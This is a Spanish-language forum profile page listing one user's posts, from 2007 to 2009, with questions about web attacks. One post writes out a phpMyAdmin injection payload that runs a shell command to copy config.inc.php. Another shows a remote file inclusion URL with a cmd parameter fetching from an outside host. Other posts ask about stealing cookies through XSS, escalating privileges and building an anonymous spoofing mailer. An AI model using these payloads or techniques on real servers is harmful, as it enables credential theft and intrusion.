Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Rienzi

#1
Buenas, hoy he escaneado mi sitio web en busca de vulns y me ha aparecido que este directorio se encuentra público: /cgi-sys/Count.cgi  ¿Qué problemas y riesgos ha podido acarrearme?
#2
Muchas gracias ^^ era justo lo que buscaba, es curioso ahora me permite escribir y crear tablas dentro de una base de datos, curioso...
#3
Hola!, llevo ya un rato ojeando paginas pero no logro encontrar nada factible sobre los Token en phpmyadmin el caso es que  estoy con la sesion iniciada dentro de phpmyadmin pero no se de donde sacar el Token actual de la sesion para comprobar si es vuln a esta inject:

/server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]

salu2.
#4
Nivel Web / Re: [DUDA] Steal Cookies con XXS
17 Enero 2009, 22:22 PM
woahh horas buscandolo y lo tenia en la cara!! muchas gracias!!, ;D
#5
Nivel Web / [DUDA] Steal Cookies con XSS
17 Enero 2009, 19:54 PM
Hola, estoy testeando la seguridad de mi webmail un SquirrelMail con version 1.4.9a, buscando por security focus he encontrado lo siguiente:
http://www.securityfocus.com/bid/23910/discuss
Bien, una vez encontrada dicha informacion me he puesto manos a la obra buscando informacion sobre Steal de Cookies mediante XXS por Sangoogle despues de ojear varios manuales en ingles he podido entender que para almacenar una cookie remota un usuario deberia ejecutar una direccion web maliciosa con un script en php estando dentro de SquirrelMail, esto haria que al ejecutar la direccion web la cookie del administrador quedaria plasmada en otro archivo independiente, todo ese proceso como es evidente lo he entendido a la perfeccion.
El problema ha venido hace unos minutos cuando me he dispuesto a buscar un tutorial mas completo donde añada el codigo fuente para utilizarlo, he encontrado varios video tutoriales en milworm los cuales apenas daban informacion para compilarlo, alguien seria tan amable de darme a conocer algun buen tutorial donde expliquen los pasos detallados aun que este este en ingles?, gracias.
#6
Hacking / Re: Acceso a otro PC de mi propia WLAN
14 Agosto 2008, 00:21 AM
Hey as mirado a ver si puedes entrar por netbioss?.
#7
Buenas, estoy intentando hacer un mailer anonymo en VB 6.0, tengo ya la parte gráfica totalmente completa, ahora me toca empezar con la escrita y me gustaría saber como puedo hacer que el usuario cuando rellene el formulario (servidor smtp, mail falso y mail víctima), se conecte con el servidor smtp especificado y remita los datos especificados.
#8
tienes un decodificador de cable? lo digo por que si no es asi es normal que no te deje, lo mejor que puedes hacer es cojer uno de ONO o de la operadora que tengas de cable y intentarlo.
#9
Buenas, resulta que puedo iniciar sesion con cualquier nombre de usuario en un servidor de phpmyadmin debido a una extraña vuln la cual simple solucion es reiniciar la configuracion, bien pues me gustaria saber si hay algun modo de escalar privilegios.
PD:Las tablas users/admin etc.. no estan solo me muestra 1 y no me deja añadir mas tablas pero si modificarlas esto ultimo no me sirve de nada pues no quiero perjudicar a nadie.
#10
Nivel Web / Re: [?] File include
20 Agosto 2007, 20:57 PM
jejeje muchas gracias por responder ahora cuando uso el

<?php
echo "<?php phpinfo(); ?>
";
?>


me da a descargar el archivo phplines de el servidor creo que puedo descargar cualquier archivo del server mmmm es eso??es que no me apareció config alguna jeje creo que se me escapa algo eso si cuando intento abrir el susodicho ar4chivo del server vulnerable me aparece completamente en blanco (abierto con block de notas).
Porcierto de que manera podria enviar comandos directamente? asi
www.vulnerable.com/vuln.php?page=http://www.host2.com/archivo.txt?cmd=[comando] ???

Pd: Creo que en vez de descargar archivos lo que hago es crearlos en el server vurln y descargarlos.